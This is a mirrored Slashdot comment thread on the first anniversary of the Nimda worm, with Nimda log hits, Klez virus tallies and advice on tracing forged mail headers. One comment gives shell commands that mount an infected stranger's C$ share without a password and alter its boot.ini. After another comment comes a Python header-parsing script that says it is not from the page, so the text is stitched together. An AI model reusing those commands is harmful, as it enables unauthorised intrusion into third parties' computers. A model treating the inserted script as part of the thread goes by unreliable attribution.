Slashdot Mirror


1 Year Anniversary of Nimda Outbreak

dots and loops writes "Today marks one year to the date that the Nimda worm began making its way across the Internet." Hey, speaking of hilarious worms, I'm still getting 5-10 Klez viruses a day! Yay Security!

10 of 289 comments

  1. Still kicking by JediTrainer · · Score: 5, Informative

    If anybody is interested, I developed WormScan last year, which is a Java-based program (GPL) which can analyze your Apache log files for pretty much anything you want (just plug in your regular expressions). It detects Nimda and CR1+2 out of the box. It's easy to add your own entries to scan for.

    According to my logs (please be gentle), I was hit 650 times yesterday.

    Shameless plug, yes. But it does the job and the users of WormScan seem to be pretty happy with it, judging from the emails I've gotten so far.

    --

    You can accomplish anything you set your mind to. The impossible just takes a little longer.
  2. Slapper by Dynamoo · · Score: 3, Informative
    Aww heck I hadn't realised Nimda was a year old.. maybe it's not a coincidence that Slapper is gearing up a huge P2P Apache-based worm for something.. maybe today?

    Where did I put my hard hat? I think I might be needing it.

    --
    Never email donotemail@WeAreSpammers.com
  3. Re:5-10? by Anonymous Coward · · Score: 0, Informative

    Stats for a central server handling about 1000 email addresses over about a week (sendmail-milter/amavis/sophos):

    Virus: W32/Klez-H found 476 times (68 %)
    Virus: W32/Yaha-E found 99 times (14 %)
    Virus: W32/Sircam-A found 86 times (12 %)
    Virus: W32/Magistr-B found 16 times (2 %)
    Virus: W95/CIH-10xx found 3 times ( <1 %)
    Virus: W32/Nimda-A found 3 times ( <1 %)
    Virus: W32/Yaha-D found 1 times ( <1 %)
    Virus: W32/ElKern-A found 1 times ( <1 %)
    Virus: VBS/Redlof-A found 2 times ( <1 %)
    Virus: W32/Cervivec-A found 1 times ( <1 %)
    Virus: W32/Hybris-C found 1 times ( <1 %)
    Virus: W32/Weird-10240 found 1 times ( <1 %)
    Virus: W32/Hybris-B found 2 times ( <1 %)
    Virus: W32/Klez-E found 1 times ( <1 %)

  4. Re:NIMDA the sysadmins friend :-s a little anecdot by fruey · · Score: 2, Informative
    http://www.perl.com/language/misc/virus.html

    It's viruses.

    --
    Conversion Rate Optimisation French / English consultant
  5. Still getting hit by rossz · · Score: 5, Informative

    No doubt in celebration of the birthday, I got a number of nimda hits this morning.

    mount -t smbfs password= //xx.xx.xx.xx/C$ /mnt/dork
    vi /mnt/dork/boot.ini

    Change the boot delay to some huge number and the boot message to "Run a virus scanner, asshole".

    umount /mnt/dork

    --
    -- Will program for bandwidth
  6. Re:How to block Klez emails from my mailbox? by Draoi · · Score: 4, Informative
    Replying to the senders (the From: address) won't work, 'coz it's forged. Klez pulls email addresses from the victim's address book/inbox and uses them for the 'from'. You have to look deeper into the headers to find the culprit.

    Here's one I just got;

    From: webmaster <webmaster@msn.com>
    Date: Wed Sep 18, 2002 15:03:16 Europe/Dublin
    To: webmaster@christymoore.net
    Subject: User code here
    Return-Path: <tony_XXXXXXXX@oceanfree.net>
    Received: from bubble.oceanfree.net ([212.2.162.35]) by ddandd.com (8.11.6/8.11.6) with ESMTP id g8IEADp05002 for <webmaster@christymoore.net>; Wed, 18 Sep 2002 15:10:13 +0100
    Received: from [193.203.147.182] (helo=Qrxy) by bubble.oceanfree.net with smtp (Exim 3.33 #3) id 17rfQB-0002p3-00 for webmaster@christymoore.net; Wed, 18 Sep 2002 15:03:16 +0100
    Mime-Version: 1.0
    Content-Type: multipart/alternative; boundary=Z0z7O8r66243H01338eADBxj05jJ7LLMnHZ85
    Message-Id: <E17rfQB-0002p3-00@bubble.oceanfree.net>
    Status:
    Attachments: There is 1 attachment
    Do you think this was sent by webmaster@msn.com? (I hear the jokes now!). In this case, the Return-path actually contained the victim's full mail address, which I've mercifully blanked ...
    --
    Alison

    "It is a miracle that curiosity survives formal education." - Albert Einstein
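As an added example (not code from the page or from the commenter), here is a small Python parser that walks the Received: chain of headers like the ones quoted above, oldest hop first, to find the host that injected the message; the sample header block is constructed from the quoted headers (the blanked Return-Path kept blanked), and the From-domain comparison is my own heuristic, not a standard.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Constructed sample, modelled on the headers quoted in the comment above.
SAMPLE_HEADERS = """\
From: webmaster <webmaster@msn.com>
To: webmaster@christymoore.net
Subject: User code here
Return-Path: <tony_XXXXXXXX@oceanfree.net>
Received: from bubble.oceanfree.net ([212.2.162.35]) by ddandd.com (8.11.6/8.11.6) with ESMTP id g8IEADp05002 for <webmaster@christymoore.net>; Wed, 18 Sep 2002 15:10:13 +0100
Received: from [193.203.147.182] (helo=Qrxy) by bubble.oceanfree.net with smtp (Exim 3.33 #3) id 17rfQB-0002p3-00 for webmaster@christymoore.net; Wed, 18 Sep 2002 15:03:16 +0100
Message-Id: <E17rfQB-0002p3-00@bubble.oceanfree.net>

"""

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
HELO_RE = re.compile(r"helo=([^\s)]+)")
BY_RE = re.compile(r"\bby\s+(\S+)")


def received_chain(raw):
    """Return Received hops oldest-first as (from_ip, helo_name, by_host)."""
    msg = message_from_string(raw)
    hops = []
    # Each MTA prepends its Received: line, so the LAST header is the first hop.
    for hdr in reversed(msg.get_all("Received", [])):
        hdr = " ".join(hdr.split())  # unfold continuation lines
        ip, helo, by = IP_RE.search(hdr), HELO_RE.search(hdr), BY_RE.search(hdr)
        hops.append((ip.group(1) if ip else None,
                     helo.group(1) if helo else None,
                     by.group(1) if by else None))
    return hops


def origin_ip(raw):
    """IP the earliest hop was received from: the host that injected the mail."""
    hops = received_chain(raw)
    return hops[0][0] if hops else None


def from_domain_matches_path(raw):
    """Heuristic (assumption): the From: domain is plausible only if the first
    MTA that accepted the message belongs to that domain. Klez's forged
    From: fails this because the mail entered via the victim's ISP relay."""
    msg = message_from_string(raw)
    from_domain = parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()
    hops = received_chain(raw)
    if not hops or not from_domain or not hops[0][2]:
        return False
    first_mta = hops[0][2].lower()
    return first_mta == from_domain or first_mta.endswith("." + from_domain)
```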

  7. Klez programmed to go off September 13 by Anonymous Coward · · Score: 2, Informative

    The reason why Klez and its variants are still going strong now is because they are programmed to commence 'attacking' on September 13 (among other dates). Lots of systems were infected but because the virus was dormant, they were undetected. Since September 13, Klez has been in full force.

  8. Re:The most long-lived virus/worm/trojan? by shepherd_97850 · · Score: 2, Informative

    Here is some data from an ISP mail server (out of 384k delivered messages): .41% of all mail traffic was the Klez virus. Top Viri by messages (percentage by delivered messages):

    1144 (0.41) W32/Klez.h@MM
    83 (0.03) W32/Nimda.htm
    40 (0.01) W32/SirCam@MM
    33 (0.01) W32/Magistr.b@MM
    30 (0.01) W32/Hybris.gen@MM
    23 (0.01) W32/Yaha.g@MM

  9. Re:reporting klez by Eric+Savage · · Score: 2, Informative

    You realize that Klez is a client virus right? Mailing abuse@ is only going to piss off the person reading and take time away from dealing with issues they have some control over.

    --

    This is not the greatest sig in the world, this is just a tribute.
  10. Re:reporting klez by leviramsey · · Score: 2, Informative

    It depends on the network you're emailing to. University IT departments, being knowledgeable, will tend to just immediately disable that computer's MAC address.

    For instance, UMass apparently tells the DHCP server to assign an IP address on one of the netblocks reserved for NAT and has the routers redirect any HTTP requests to a page saying that that computer's rights to access the network have been suspended and how to restore those rights (apply the patches, and inform the IT people, who presumably run a scan on your computer to determine whether you've patched).